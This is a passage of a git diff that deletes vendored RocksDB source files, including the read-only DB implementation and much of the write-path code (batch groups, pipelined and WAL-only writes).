-    // reference to default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status DB::OpenForReadOnly(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, DB** dbptr,
-    bool error_if_log_file_exist) {
-  *dbptr = nullptr;
-  handles->clear();
-
-  DBImplReadOnly* impl = new DBImplReadOnly(db_options, dbname);
-  impl->mutex_.Lock();
-  Status s = impl->Recover(column_families, true /* read only */,
-                           error_if_log_file_exist);
-  if (s.ok()) {
-    // set column family handles
-    for (auto cf : column_families) {
-      auto cfd =
-          impl->versions_->GetColumnFamilySet()->GetColumnFamily(cf.name);
-      if (cfd == nullptr) {
-        s = Status::InvalidArgument("Column family not found: ", cf.name);
-        break;
-      }
-      handles->push_back(new ColumnFamilyHandleImpl(cfd, impl, &impl->mutex_));
-    }
-  }
-  if (s.ok()) {
-    for (auto cfd : *impl->versions_->GetColumnFamilySet()) {
-      delete cfd->InstallSuperVersion(new SuperVersion(), &impl->mutex_);
-    }
-  }
-  impl->mutex_.Unlock();
-  if (s.ok()) {
-    *dbptr = impl;
-    for (auto* h : *handles) {
-      impl->NewThreadStatusCfInfo(
-          reinterpret_cast<ColumnFamilyHandleImpl*>(h)->cfd());
-    }
-  } else {
-    for (auto h : *handles) {
-      delete h;
-    }
-    handles->clear();
-    delete impl;
-  }
-  return s;
-}
-
-#else  // !ROCKSDB_LITE
-
-Status DB::OpenForReadOnly(const Options& options, const std::string& dbname,
-                           DB** dbptr, bool error_if_log_file_exist) {
-  return Status::NotSupported("Not supported in ROCKSDB_LITE.");
-}
-
-Status DB::OpenForReadOnly(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, DB** dbptr,
-    bool error_if_log_file_exist) {
-  return Status::NotSupported("Not supported in ROCKSDB_LITE.");
-}
-#endif  // !ROCKSDB_LITE
-
-}   // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_impl_readonly.h b/thirdparty/rocksdb/db/db_impl_readonly.h
deleted file mode 100644
index 9bdc95c..0000000
--- a/thirdparty/rocksdb/db/db_impl_readonly.h
+++ /dev/null
@@ -1,123 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include <vector>
-#include <string>
-
-namespace rocksdb {
-
-class DBImplReadOnly : public DBImpl {
- public:
-  DBImplReadOnly(const DBOptions& options, const std::string& dbname);
-  virtual ~DBImplReadOnly();
-
-  // Implementations of the DB interface
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-
-  // TODO: Implement ReadOnly MultiGet?
-
-  using DBImpl::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions&,
-                                ColumnFamilyHandle* column_family) override;
-
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override;
-
-  using DBImpl::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& value) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::Delete;
-  virtual Status Delete(const WriteOptions& options,
-                        ColumnFamilyHandle* column_family,
-                        const Slice& key) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::SingleDelete;
-  virtual Status SingleDelete(const WriteOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice& key) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  using DBImpl::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DBImpl::CompactFiles;
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  virtual Status DisableFileDeletions() override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  virtual Status EnableFileDeletions(bool force) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DBImpl::Flush;
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DBImpl::SyncWAL;
-  virtual Status SyncWAL() override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& ingestion_options) override {
-    return Status::NotSupported("Not supported operation in read only mode.");
-  }
-
- private:
-  friend class DB;
-
-  // No copying allowed
-  DBImplReadOnly(const DBImplReadOnly&);
-  void operator=(const DBImplReadOnly&);
-};
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/db_impl_write.cc b/thirdparty/rocksdb/db/db_impl_write.cc
deleted file mode 100644
index 8a11948..0000000
--- a/thirdparty/rocksdb/db/db_impl_write.cc
+++ /dev/null
@@ -1,1263 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-#include "db/event_helpers.h"
-#include "monitoring/perf_context_imp.h"
-#include "options/options_helper.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-// Convenience methods
-Status DBImpl::Put(const WriteOptions& o, ColumnFamilyHandle* column_family,
-                   const Slice& key, const Slice& val) {
-  return DB::Put(o, column_family, key, val);
-}
-
-Status DBImpl::Merge(const WriteOptions& o, ColumnFamilyHandle* column_family,
-                     const Slice& key, const Slice& val) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  if (!cfh->cfd()->ioptions()->merge_operator) {
-    return Status::NotSupported("Provide a merge_operator when opening DB");
-  } else {
-    return DB::Merge(o, column_family, key, val);
-  }
-}
-
-Status DBImpl::Delete(const WriteOptions& write_options,
-                      ColumnFamilyHandle* column_family, const Slice& key) {
-  return DB::Delete(write_options, column_family, key);
-}
-
-Status DBImpl::SingleDelete(const WriteOptions& write_options,
-                            ColumnFamilyHandle* column_family,
-                            const Slice& key) {
-  return DB::SingleDelete(write_options, column_family, key);
-}
-
-Status DBImpl::Write(const WriteOptions& write_options, WriteBatch* my_batch) {
-  return WriteImpl(write_options, my_batch, nullptr, nullptr);
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::WriteWithCallback(const WriteOptions& write_options,
-                                 WriteBatch* my_batch,
-                                 WriteCallback* callback) {
-  return WriteImpl(write_options, my_batch, callback, nullptr);
-}
-#endif  // ROCKSDB_LITE
-
-Status DBImpl::WriteImpl(const WriteOptions& write_options,
-                         WriteBatch* my_batch, WriteCallback* callback,
-                         uint64_t* log_used, uint64_t log_ref,
-                         bool disable_memtable, uint64_t* seq_used) {
-  if (my_batch == nullptr) {
-    return Status::Corruption("Batch is nullptr!");
-  }
-  if (concurrent_prepare_ && immutable_db_options_.enable_pipelined_write) {
-    return Status::NotSupported(
-        "pipelined_writes is not compatible with concurrent prepares");
-  }
-
-  Status status;
-  if (write_options.low_pri) {
-    status = ThrottleLowPriWritesIfNeeded(write_options, my_batch);
-    if (!status.ok()) {
-      return status;
-    }
-  }
-
-  if (concurrent_prepare_ && disable_memtable) {
-    return WriteImplWALOnly(write_options, my_batch, callback, log_used,
-                            log_ref, seq_used);
-  }
-
-  if (immutable_db_options_.enable_pipelined_write) {
-    return PipelinedWriteImpl(write_options, my_batch, callback, log_used,
-                              log_ref, disable_memtable, seq_used);
-  }
-
-  PERF_TIMER_GUARD(write_pre_and_post_process_time);
-  WriteThread::Writer w(write_options, my_batch, callback, log_ref,
-                        disable_memtable);
-
-  if (!write_options.disableWAL) {
-    RecordTick(stats_, WRITE_WITH_WAL);
-  }
-
-  StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE);
-
-  write_thread_.JoinBatchGroup(&w);
-  if (w.state == WriteThread::STATE_PARALLEL_MEMTABLE_WRITER) {
-    // we are a non-leader in a parallel group
-    PERF_TIMER_GUARD(write_memtable_time);
-
-    if (w.ShouldWriteToMemtable()) {
-      ColumnFamilyMemTablesImpl column_family_memtables(
-          versions_->GetColumnFamilySet());
-      w.status = WriteBatchInternal::InsertInto(
-          &w, w.sequence, &column_family_memtables, &flush_scheduler_,
-          write_options.ignore_missing_column_families, 0 /*log_number*/, this,
-          true /*concurrent_memtable_writes*/);
-    }
-
-    if (write_thread_.CompleteParallelMemTableWriter(&w)) {
-      // we're responsible for exit batch group
-      auto last_sequence = w.write_group->last_sequence;
-      versions_->SetLastSequence(last_sequence);
-      MemTableInsertStatusCheck(w.status);
-      write_thread_.ExitAsBatchGroupFollower(&w);
-    }
-    assert(w.state == WriteThread::STATE_COMPLETED);
-    // STATE_COMPLETED conditional below handles exit
-
-    status = w.FinalStatus();
-  }
-  if (w.state == WriteThread::STATE_COMPLETED) {
-    if (log_used != nullptr) {
-      *log_used = w.log_used;
-    }
-    if (seq_used != nullptr) {
-      *seq_used = w.sequence;
-    }
-    // write is complete and leader has updated sequence
-    return w.FinalStatus();
-  }
-  // else we are the leader of the write batch group
-  assert(w.state == WriteThread::STATE_GROUP_LEADER);
-
-  // Once reaches this point, the current writer "w" will try to do its write
-  // job.  It may also pick up some of the remaining writers in the "writers_"
-  // when it finds suitable, and finish them in the same write batch.
-  // This is how a write job could be done by the other writer.
-  WriteContext write_context;
-  WriteThread::WriteGroup write_group;
-  bool in_parallel_group = false;
-  uint64_t last_sequence = kMaxSequenceNumber;
-  if (!concurrent_prepare_) {
-    last_sequence = versions_->LastSequence();
-  }
-
-  mutex_.Lock();
-
-  bool need_log_sync = !write_options.disableWAL && write_options.sync;
-  bool need_log_dir_sync = need_log_sync && !log_dir_synced_;
-  if (!concurrent_prepare_ || !disable_memtable) {
-    // With concurrent writes we do preprocess only in the write thread that
-    // also does write to memtable to avoid sync issue on shared data structure
-    // with the other thread
-    status = PreprocessWrite(write_options, &need_log_sync, &write_context);
-  }
-  log::Writer* log_writer = logs_.back().writer;
-
-  mutex_.Unlock();
-
-  // Add to log and apply to memtable.  We can release the lock
-  // during this phase since &w is currently responsible for logging
-  // and protects against concurrent loggers and concurrent writes
-  // into memtables
-
-  last_batch_group_size_ =
-      write_thread_.EnterAsBatchGroupLeader(&w, &write_group);
-
-  if (status.ok()) {
-    // Rules for when we can update the memtable concurrently
-    // 1. supported by memtable
-    // 2. Puts are not okay if inplace_update_support
-    // 3. Merges are not okay
-    //
-    // Rules 1..2 are enforced by checking the options
-    // during startup (CheckConcurrentWritesSupported), so if
-    // options.allow_concurrent_memtable_write is true then they can be
-    // assumed to be true.  Rule 3 is checked for each batch.  We could
-    // relax rules 2 if we could prevent write batches from referring
-    // more than once to a particular key.
-    bool parallel = immutable_db_options_.allow_concurrent_memtable_write &&
-                    write_group.size > 1;
-    int total_count = 0;
-    uint64_t total_byte_size = 0;
-    for (auto* writer : write_group) {
-      if (writer->CheckCallback(this)) {
-        if (writer->ShouldWriteToMemtable()) {
-          total_count += WriteBatchInternal::Count(writer->batch);
-          parallel = parallel && !writer->batch->HasMerge();
-        }
-
-        total_byte_size = WriteBatchInternal::AppendedByteSize(
-            total_byte_size, WriteBatchInternal::ByteSize(writer->batch));
-      }
-    }
-
-    const bool concurrent_update = concurrent_prepare_;
-    // Update stats while we are an exclusive group leader, so we know
-    // that nobody else can be writing to these particular stats.
-    // We're optimistic, updating the stats before we successfully
-    // commit.  That lets us release our leader status early.
-    auto stats = default_cf_internal_stats_;
-    stats->AddDBStats(InternalStats::NUMBER_KEYS_WRITTEN, total_count,
-                      concurrent_update);
-    RecordTick(stats_, NUMBER_KEYS_WRITTEN, total_count);
-    stats->AddDBStats(InternalStats::BYTES_WRITTEN, total_byte_size,
-                      concurrent_update);
-    RecordTick(stats_, BYTES_WRITTEN, total_byte_size);
-    stats->AddDBStats(InternalStats::WRITE_DONE_BY_SELF, 1, concurrent_update);
-    RecordTick(stats_, WRITE_DONE_BY_SELF);
-    auto write_done_by_other = write_group.size - 1;
-    if (write_done_by_other > 0) {
-      stats->AddDBStats(InternalStats::WRITE_DONE_BY_OTHER, write_done_by_other,
-                        concurrent_update);
-      RecordTick(stats_, WRITE_DONE_BY_OTHER, write_done_by_other);
-    }
-    MeasureTime(stats_, BYTES_PER_WRITE, total_byte_size);
-
-    if (write_options.disableWAL) {
-      has_unpersisted_data_.store(true, std::memory_order_relaxed);
-    }
-
-    PERF_TIMER_STOP(write_pre_and_post_process_time);
-
-    if (!concurrent_prepare_) {
-      if (status.ok() && !write_options.disableWAL) {
-        PERF_TIMER_GUARD(write_wal_time);
-        status = WriteToWAL(write_group, log_writer, log_used, need_log_sync,
-                            need_log_dir_sync, last_sequence + 1);
-      }
-    } else {
-      if (status.ok() && !write_options.disableWAL) {
-        PERF_TIMER_GUARD(write_wal_time);
-        // LastToBeWrittenSequence is increased inside WriteToWAL under
-        // wal_write_mutex_ to ensure ordered events in WAL
-        status = ConcurrentWriteToWAL(write_group, log_used, &last_sequence,
-                                      total_count);
-      } else {
-        // Otherwise we inc seq number for memtable writes
-        last_sequence = versions_->FetchAddLastToBeWrittenSequence(total_count);
-      }
-    }
-    assert(last_sequence != kMaxSequenceNumber);
-    const SequenceNumber current_sequence = last_sequence + 1;
-    last_sequence += total_count;
-
-    if (status.ok()) {
-      PERF_TIMER_GUARD(write_memtable_time);
-
-      if (!parallel) {
-        w.status = WriteBatchInternal::InsertInto(
-            write_group, current_sequence, column_family_memtables_.get(),
-            &flush_scheduler_, write_options.ignore_missing_column_families,
-            0 /*recovery_log_number*/, this);
-      } else {
-        SequenceNumber next_sequence = current_sequence;
-        for (auto* writer : write_group) {
-          if (writer->ShouldWriteToMemtable()) {
-            writer->sequence = next_sequence;
-            next_sequence += WriteBatchInternal::Count(writer->batch);
-          }
-        }
-        write_group.last_sequence = last_sequence;
-        write_group.running.store(static_cast<uint32_t>(write_group.size),
-                                  std::memory_order_relaxed);
-        write_thread_.LaunchParallelMemTableWriters(&write_group);
-        in_parallel_group = true;
-
-        // Each parallel follower is doing each own writes. The leader should
-        // also do its own.
-        if (w.ShouldWriteToMemtable()) {
-          ColumnFamilyMemTablesImpl column_family_memtables(
-              versions_->GetColumnFamilySet());
-          assert(w.sequence == current_sequence);
-          w.status = WriteBatchInternal::InsertInto(
-              &w, w.sequence, &column_family_memtables, &flush_scheduler_,
-              write_options.ignore_missing_column_families, 0 /*log_number*/,
-              this, true /*concurrent_memtable_writes*/);
-        }
-        if (seq_used != nullptr) {
-          *seq_used = w.sequence;
-        }
-      }
-    }
-  }
-  PERF_TIMER_START(write_pre_and_post_process_time);
-
-  if (!w.CallbackFailed()) {
-    WriteCallbackStatusCheck(status);
-  }
-
-  if (need_log_sync) {
-    mutex_.Lock();
-    MarkLogsSynced(logfile_number_, need_log_dir_sync, status);
-    mutex_.Unlock();
-    // Requesting sync with concurrent_prepare_ is expected to be very rare. We
-    // hance provide a simple implementation that is not necessarily efficient.
-    if (concurrent_prepare_) {
-      if (manual_wal_flush_) {
-        status = FlushWAL(true);
-      } else {
-        status = SyncWAL();
-      }
-    }
-  }
-
-  bool should_exit_batch_group = true;
-  if (in_parallel_group) {
-    // CompleteParallelWorker returns true if this thread should
-    // handle exit, false means somebody else did
-    should_exit_batch_group = write_thread_.CompleteParallelMemTableWriter(&w);
-  }
-  if (should_exit_batch_group) {
-    if (status.ok()) {
-      versions_->SetLastSequence(last_sequence);
-    }
-    MemTableInsertStatusCheck(w.status);
-    write_thread_.ExitAsBatchGroupLeader(write_group, w.status);
-  }
-
-  if (status.ok()) {
-    status = w.FinalStatus();
-  }
-  return status;
-}
-
-Status DBImpl::PipelinedWriteImpl(const WriteOptions& write_options,
-                                  WriteBatch* my_batch, WriteCallback* callback,
-                                  uint64_t* log_used, uint64_t log_ref,
-                                  bool disable_memtable, uint64_t* seq_used) {
-  PERF_TIMER_GUARD(write_pre_and_post_process_time);
-  StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE);
-
-  WriteContext write_context;
-
-  WriteThread::Writer w(write_options, my_batch, callback, log_ref,
-                        disable_memtable);
-  write_thread_.JoinBatchGroup(&w);
-  if (w.state == WriteThread::STATE_GROUP_LEADER) {
-    WriteThread::WriteGroup wal_write_group;
-    if (w.callback && !w.callback->AllowWriteBatching()) {
-      write_thread_.WaitForMemTableWriters();
-    }
-    mutex_.Lock();
-    bool need_log_sync = !write_options.disableWAL && write_options.sync;
-    bool need_log_dir_sync = need_log_sync && !log_dir_synced_;
-    w.status = PreprocessWrite(write_options, &need_log_sync, &write_context);
-    log::Writer* log_writer = logs_.back().writer;
-    mutex_.Unlock();
-
-    // This can set non-OK status if callback fail.
-    last_batch_group_size_ =
-        write_thread_.EnterAsBatchGroupLeader(&w, &wal_write_group);
-    const SequenceNumber current_sequence =
-        write_thread_.UpdateLastSequence(versions_->LastSequence()) + 1;
-    size_t total_count = 0;
-    size_t total_byte_size = 0;
-
-    if (w.status.ok()) {
-      SequenceNumber next_sequence = current_sequence;
-      for (auto writer : wal_write_group) {
-        if (writer->CheckCallback(this)) {
-          if (writer->ShouldWriteToMemtable()) {
-            writer->sequence = next_sequence;
-            size_t count = WriteBatchInternal::Count(writer->batch);
-            next_sequence += count;
-            total_count += count;
-          }
-          total_byte_size = WriteBatchInternal::AppendedByteSize(
-              total_byte_size, WriteBatchInternal::ByteSize(writer->batch));
-        }
-      }
-      if (w.disable_wal) {
-        has_unpersisted_data_.store(true, std::memory_order_relaxed);
-      }
-      write_thread_.UpdateLastSequence(current_sequence + total_count - 1);
-    }
-
-    auto stats = default_cf_internal_stats_;
-    stats->AddDBStats(InternalStats::NUMBER_KEYS_WRITTEN, total_count);
-    RecordTick(stats_, NUMBER_KEYS_WRITTEN, total_count);
-    stats->AddDBStats(InternalStats::BYTES_WRITTEN, total_byte_size);
-    RecordTick(stats_, BYTES_WRITTEN, total_byte_size);
-
-    PERF_TIMER_STOP(write_pre_and_post_process_time);
-
-    if (w.ShouldWriteToWAL()) {
-      PERF_TIMER_GUARD(write_wal_time);
-      stats->AddDBStats(InternalStats::WRITE_DONE_BY_SELF, 1);
-      RecordTick(stats_, WRITE_DONE_BY_SELF, 1);
-      if (wal_write_group.size > 1) {
-        stats->AddDBStats(InternalStats::WRITE_DONE_BY_OTHER,
-                          wal_write_group.size - 1);
-        RecordTick(stats_, WRITE_DONE_BY_OTHER, wal_write_group.size - 1);
-      }
-      w.status = WriteToWAL(wal_write_group, log_writer, log_used,
-                            need_log_sync, need_log_dir_sync, current_sequence);
-    }
-
-    if (!w.CallbackFailed()) {
-      WriteCallbackStatusCheck(w.status);
-    }
-
-    if (need_log_sync) {
-      mutex_.Lock();
-      MarkLogsSynced(logfile_number_, need_log_dir_sync, w.status);
-      mutex_.Unlock();
-    }
-
-    write_thread_.ExitAsBatchGroupLeader(wal_write_group, w.status);
-  }
-
-  WriteThread::WriteGroup memtable_write_group;
-  if (w.state == WriteThread::STATE_MEMTABLE_WRITER_LEADER) {
-    PERF_TIMER_GUARD(write_memtable_time);
-    assert(w.status.ok());
-    write_thread_.EnterAsMemTableWriter(&w, &memtable_write_group);
-    if (memtable_write_group.size > 1 &&
-        immutable_db_options_.allow_concurrent_memtable_write) {
-      write_thread_.LaunchParallelMemTableWriters(&memtable_write_group);
-    } else {
-      memtable_write_group.status = WriteBatchInternal::InsertInto(
-          memtable_write_group, w.sequence, column_family_memtables_.get(),
-          &flush_scheduler_, write_options.ignore_missing_column_families,
-          0 /*log_number*/, this);
-      versions_->SetLastSequence(memtable_write_group.last_sequence);
-      write_thread_.ExitAsMemTableWriter(&w, memtable_write_group);
-    }
-  }
-
-  if (w.state == WriteThread::STATE_PARALLEL_MEMTABLE_WRITER) {
-    assert(w.ShouldWriteToMemtable());
-    ColumnFamilyMemTablesImpl column_family_memtables(
-        versions_->GetColumnFamilySet());
-    w.status = WriteBatchInternal::InsertInto(
-        &w, w.sequence, &column_family_memtables, &flush_scheduler_,
-        write_options.ignore_missing_column_families, 0 /*log_number*/, this,
-        true /*concurrent_memtable_writes*/);
-    if (write_thread_.CompleteParallelMemTableWriter(&w)) {
-      MemTableInsertStatusCheck(w.status);
-      versions_->SetLastSequence(w.write_group->last_sequence);
-      write_thread_.ExitAsMemTableWriter(&w, *w.write_group);
-    }
-  }
-  if (seq_used != nullptr) {
-    *seq_used = w.sequence;
-  }
-
-  assert(w.state == WriteThread::STATE_COMPLETED);
-  return w.FinalStatus();
-}
-
-Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options,
-                                WriteBatch* my_batch, WriteCallback* callback,
-                                uint64_t* log_used, uint64_t log_ref,
-                                uint64_t* seq_used) {
-  Status status;
-  PERF_TIMER_GUARD(write_pre_and_post_process_time);
-  WriteThread::Writer w(write_options, my_batch, callback, log_ref,
-                        true /* disable_memtable */);
-  if (write_options.disableWAL) {
-    return status;
-  }
-  RecordTick(stats_, WRITE_WITH_WAL);
-  StopWatch write_sw(env_, immutable_db_options_.statistics.get(), DB_WRITE);
-
-  nonmem_write_thread_.JoinBatchGroup(&w);
-  assert(w.state != WriteThread::STATE_PARALLEL_MEMTABLE_WRITER);
-  if (w.state == WriteThread::STATE_COMPLETED) {
-    if (log_used != nullptr) {
-      *log_used = w.log_used;
-    }
-    if (seq_used != nullptr) {
-      *seq_used = w.sequence;
-    }
-    return w.FinalStatus();
-  }
-  // else we are the leader of the write batch group
-  assert(w.state == WriteThread::STATE_GROUP_LEADER);
-  WriteContext write_context;
-  WriteThread::WriteGroup write_group;
-  uint64_t last_sequence;
-  nonmem_write_thread_.EnterAsBatchGroupLeader(&w, &write_group);
-  // Note: no need to update last_batch_group_size_ here since the batch writes
-  // to WAL only
-
-  uint64_t total_byte_size = 0;
-  for (auto* writer : write_group) {
-    if (writer->CheckCallback(this)) {
-      total_byte_size = WriteBatchInternal::AppendedByteSize(
-          total_byte_size, WriteBatchInternal::ByteSize(writer->batch));
-    }
-  }
-
-  const bool concurrent_update = true;
-  // Update stats while we are an exclusive group leader, so we know
-  // that nobody else can be writing to these particular stats.
-  // We're optimistic, updating the stats before we successfully
-  // commit.  That lets us release our leader status early.
-  auto stats = default_cf_internal_stats_;
-  stats->AddDBStats(InternalStats::BYTES_WRITTEN, total_byte_size,
-                    concurrent_update);
-  RecordTick(stats_, BYTES_WRITTEN, total_byte_size);
-  stats->AddDBStats(InternalStats::WRITE_DONE_BY_SELF, 1, concurrent_update);
-  RecordTick(stats_, WRITE_DONE_BY_SELF);
-  auto write_done_by_other = write_group.size - 1;
-  if (write_done_by_other > 0) {
-    stats->AddDBStats(InternalStats::WRITE_DONE_BY_OTHER, write_done_by_other,
-                      concurrent_update);
-    RecordTick(stats_, WRITE_DONE_BY_OTHER, write_done_by_other);
-  }
-  MeasureTime(stats_, BYTES_PER_WRITE, total_byte_size);
-
-  PERF_TIMER_STOP(write_pre_and_post_process_time);
-
-  PERF_TIMER_GUARD(write_wal_time);
-  // LastToBeWrittenSequence is increased inside WriteToWAL under
-  // wal_write_mutex_ to ensure ordered events in WAL
-  status = ConcurrentWriteToWAL(write_group, log_used, &last_sequence,
-                                0 /*total_count*/);
-  auto curr_seq = last_sequence + 1;
-  for (auto* writer : write_group) {
-    if (writer->CheckCallback(this)) {
-      writer->sequence = curr_seq;
-      curr_seq += WriteBatchInternal::Count(writer->batch);
-    }
-  }
-  if (status.ok() && write_options.sync) {
-    // Requesting sync with concurrent_prepare_ is expected to be very rare. We
-    // hance provide a simple implementation that is not necessarily efficient.
-    if (manual_wal_flush_) {
-      status = FlushWAL(true);
-    } else {
-      status = SyncWAL();
-    }
-  }
-  PERF_TIMER_START(write_pre_and_post_process_time);
-
-  if (!w.CallbackFailed()) {
-    WriteCallbackStatusCheck(status);
-  }
-  nonmem_write_thread_.ExitAsBatchGroupLeader(write_group, w.status);
-  if (status.ok()) {
-    status = w.FinalStatus();
-  }
-  if (seq_used != nullptr) {
-    *seq_used = w.sequence;
-  }
-  return status;
-}
-
-void DBImpl::WriteCallbackStatusCheck(const Status& status) {
-  // Is setting bg_error_ enough here?  This will at least stop
-  // compaction and fail any further writes.
-  if (immutable_db_options_.paranoid_checks && !status.ok() &&
-      !status.IsBusy() && !status.IsIncomplete()) {
-    mutex_.Lock();
-    if (bg_error_.ok()) {
-      Status new_bg_error = status;
-      // may temporarily unlock and lock the mutex.
-      EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                            BackgroundErrorReason::kWriteCallback,
-                                            &new_bg_error, &mutex_);
-      if (!new_bg_error.ok()) {
-        bg_error_ = new_bg_error;  // stop compaction & fail any further writes
-      }
-    }
-    mutex_.Unlock();
-  }
-}
-
-void DBImpl::MemTableInsertStatusCheck(const Status& status) {
-  // A non-OK status here indicates that the state implied by the
-  // WAL has diverged from the in-memory state.  This could be
-  // because of a corrupt write_batch (very bad), or because the
-  // client specified an invalid column family and didn't specify
-  // ignore_missing_column_families.
-  if (!status.ok()) {
-    mutex_.Lock();
-    assert(bg_error_.ok());
-    Status new_bg_error = status;
-    // may temporarily unlock and lock the mutex.
-    EventHelpers::NotifyOnBackgroundError(immutable_db_options_.listeners,
-                                          BackgroundErrorReason::kMemTable,
-                                          &new_bg_error, &mutex_);
-    if (!new_bg_error.ok()) {
-      bg_error_ = new_bg_error;  // stop compaction & fail any further writes
-    }
-    mutex_.Unlock();
-  }
-}
-
-Status DBImpl::PreprocessWrite(const WriteOptions& write_options,
-                               bool* need_log_sync,
-                               WriteContext* write_context) {
-  mutex_.AssertHeld();
-  assert(write_context != nullptr && need_log_sync != nullptr);
-  Status status;
-
-  assert(!single_column_family_mode_ ||
-         versions_->GetColumnFamilySet()->NumberOfColumnFamilies() == 1);
-  if (UNLIKELY(status.ok() && !single_column_family_mode_ &&
-               total_log_size_ > GetMaxTotalWalSize())) {
-    status = HandleWALFull(write_context);
-  }
-
-  if (UNLIKELY(status.ok() && write_buffer_manager_->ShouldFlush())) {
-    // Before a new memtable is added in SwitchMemtable(),
-    // write_buffer_manager_->ShouldFlush() will keep returning true. If another
-    // thread is writing to another DB with the same write buffer, they may also
-    // be flushed. We may end up with flushing much more DBs than needed. It's
-    // suboptimal but still correct.
-    status = HandleWriteBufferFull(write_context);
-  }
-
-  if (UNLIKELY(status.ok() && !bg_error_.ok())) {
-    return bg_error_;
-  }
-
-  if (UNLIKELY(status.ok() && !flush_scheduler_.Empty())) {
-    status = ScheduleFlushes(write_context);
-  }
-
-  if (UNLIKELY(status.ok() && (write_controller_.IsStopped() ||
-                               write_controller_.NeedsDelay()))) {
-    PERF_TIMER_GUARD(write_delay_time);
-    // We don't know size of curent batch so that we always use the size
-    // for previous one. It might create a fairness issue that expiration
-    // might happen for smaller writes but larger writes can go through.
-    // Can optimize it if it is an issue.
-    status = DelayWrite(last_batch_group_size_, write_options);
-  }
-
-  if (status.ok() && *need_log_sync) {
-    // Wait until the parallel syncs are finished. Any sync process has to sync
-    // the front log too so it is enough to check the status of front()
-    // We do a while loop since log_sync_cv_ is signalled when any sync is
-    // finished
-    // Note: there does not seem to be a reason to wait for parallel sync at
-    // this early step but it is not important since parallel sync (SyncWAL) and
-    // need_log_sync are usually not used together.
-    while (logs_.front().getting_synced) {
-      log_sync_cv_.Wait();
-    }
-    for (auto& log : logs_) {
-      assert(!log.getting_synced);
-      // This is just to prevent the logs to be synced by a parallel SyncWAL
-      // call. We will do the actual syncing later after we will write to the
-      // WAL.
-      // Note: there does not seem to be a reason to set this early before we
-      // actually write to the WAL
-      log.getting_synced = true;
-    }
-  } else {
-    *need_log_sync = false;
-  }
-
-  return status;
-}
-
-WriteBatch* DBImpl::MergeBatch(const WriteThread::WriteGroup& write_group,
-                               WriteBatch* tmp_batch, size_t* write_with_wal) {
-  assert(write_with_wal != nullptr);
-  assert(tmp_batch != nullptr);
-  WriteBatch* merged_batch = nullptr;
-  *write_with_wal = 0;
-  auto* leader = write_group.leader;
-  if (write_group.size == 1 && leader->ShouldWriteToWAL() &&
-      leader->batch->GetWalTerminationPoint().is_cleared()) {
-    // we simply write the first WriteBatch to WAL if the group only
-    // contains one batch, that batch should be written to the WAL,
